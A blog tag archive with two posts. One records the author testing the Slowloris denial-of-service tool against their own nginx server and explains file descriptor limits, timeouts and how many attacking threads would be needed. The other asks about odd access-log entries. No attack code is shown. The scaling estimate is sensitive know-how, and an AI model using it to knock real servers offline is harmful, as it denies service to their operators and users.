Tag Archives: Apache

Testing Slowloris against nginx

CCCCCCCCCCOOCCOOOOO888@8@8888OOOOCCOOO888888888@@@@@@@@@8@8@@@@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888@888888OOOCCCOOOO888888888888@88888@@@@@@@888@8OOCCoococc:::
CCCCCCCCCCCCCCOO88@@888888OOOOOOOOOO8888888O88888888O8O8OOO8888@88@@8OOCOOOCoc::
CCCCooooooCCCO88@@8@88@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888@8888OOOCc::::
CooCoCoooCCCO8@88@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88@88888@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88@888OCoccc
ooooCCOO8O888888888@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8@@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8@@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8@8@8Ooc:.:...cOO8O88c.      .  .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888@8@88888888Oo:. .  ...cO888Oc..          .oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888@88888888888Oo:.       .O8888C:  .oCOo.  ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo:       :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8@88OO8O888Oo:::... ..  :cO8Oc. . .....  :.  .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8@8Coc::..  ....  ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8@8OOCCOc:...  ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8@8@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
 ..... ............. .coocoooCCoco:::ccccccc:::ccc::..........  ....:::cc::::coC
   .  . ...    .... ..  .:cccoCooc:..  ::cccc:::c:.. ......... ......::::c:cccco
  .  .. ... ..    .. ..   ..:...:cooc::cccccc:.....  .........  .....:::::ccoocc
       .   .         .. ..::cccc:.::ccoocc:. ........... ..  . ..:::.:::::::ccco

Testing RSnake‘s Slowloris tool against a test nginx setup for myself: Though at first glance nginx is indeed not susceptible to such an attack, but observing the actual behaviour shows up some weird points. Will write more when I have some more answers/observations.

Conclusions can be found at the bottom of this post, if you can’t stand reading about experiments and whatnot.

Edit (15 Oct)

It seems that nginx is indeed affected by the Slowloris attack. Whilst the attack is in progress, no other connections can be made to the server (thus causing the DOS situation).

Based on the way Slowloris works (sending headers slooooowly) the reason why this works against nginx is because of the max file descriptors limit. Apparently each network connection to any process uses up one file descriptor, and the OS limits this number (ulimit in linux). By default it is set to 1024, though it can be changed.

I’m not sure whether this is exactly the same as the original Slowloris attack, because Slowloris exhausts a web server specific resource (Apache’s max clients for example), whereas hitting max file descriptor limits is a OS/process level “resource”.

This is a problem nonetheless, because we could try to raise the max file descriptors limit for the nginx process, and they still can be all taken up by long-lived slow-sending HTTP requests like what Slowloris does.  The only difference is that it would take FAR more connections to Slowloris attack a nginx server successfully as compared to process-cased web servers like Apache.

A problem encountered so far is that nginx seems not to honour the client_header_timeout directive, so it starts returning a “Request time out” status (408) to the Slowloris threads after a while, even when Slowloris is set to a far lower timeout than the nginx server is.  Will need to check up more on this, though with this behaviour nginx automatically recovers from a Slowloris attack after a while 😛

Edit (27 Oct)

After checking out ids and maxims reply in the forums, did some tests with the max file descriptors raised for the nginx process. Did it not by raising the ulimit -n value, but by setting worker_rlimit_nofile to a higher value. As a result nginx was able to take in “more” concurrent incoming connections this time, at least till the new ulimit for the nginx process was hit.

An interesting thing of note is that the client_header_timeout directive determines how much time a connection has to complete sending its headers for the request to be processed, and not how long nginx is willing to wait after receiving a header before it deems a connection as timed out.  This turned out to be the main factor in defending nginx against SlowLoris, when combined with nginxs other characteristics.

Conclusions

1. nginx is able to defend against small-mid scale SlowLoris attacks because it terminates requests that have not completed within a specified time (60 sec by default).  Thus the basic SlowLoris attack WON’T work, since it relies on sending headers one at a time to keep a connection occupied.

2. nginx can be downed by SlowLoris, however, if many attack nodes are used.  We will need a total of file descriptor limit for nginx / 50 SlowLoris threads to successfully mount an attack.  50 because SlowLoris is coded to run 50 connections per thread.  This would (in theory) cause any released connections to be quickly taken up again by new SlowLoris connections.  SlowLoris would also have to be set at <60 secs to work.  This is more like a DDOS attack than a SlowLoris attack though…

3. The problem with (2) above is that we might need a huge number of resources to mount it (DDOS level?).  If nginx was set to 100,000 max files limit, we would then need 100,000 / 50 = 2000 SlowLoris threads!

4. The access logs for nginx show the attack in progress as it kicks out the client connections 🙂

So… nginx is a good web server, use it! 😉

Weird web server access log entries

Don’t have the answer to this yet, but it sure makes me really really curious as to the cause.

In my web server access logs, I get plenty of entries that look like this:
69.64.58.126 - - [02/Oct/2009:14:20:55 +0800] "-" 400 0 "-" "-"

That means that these IP addresses have been connecting to my server via a particular domain, without sending any request whatsoever or so it seems. And I get a LOT of accesses from Singnet IP addresses (220.255.0.0/16 range) daily.

Have contacted them on this, but no answers as yet. And the only answer from a forum was that it’s probably load balancer generated traffic (doesn’t explain why I get many many requests from an entire Class C worth of IP addresses).

Not sure whether it was this thing that caused my 1Portfolio account to overuse server resources, since Apache is known to fork a new process for every new incoming connection, as opposed to web servers like Nginx. (And I’m still pissed at how they did NOT contact me whatsoever when they had to terminate my account immediately due to the resource overuse)

If anyone has answers/possibilities I’d sure like to hear and discuss on them!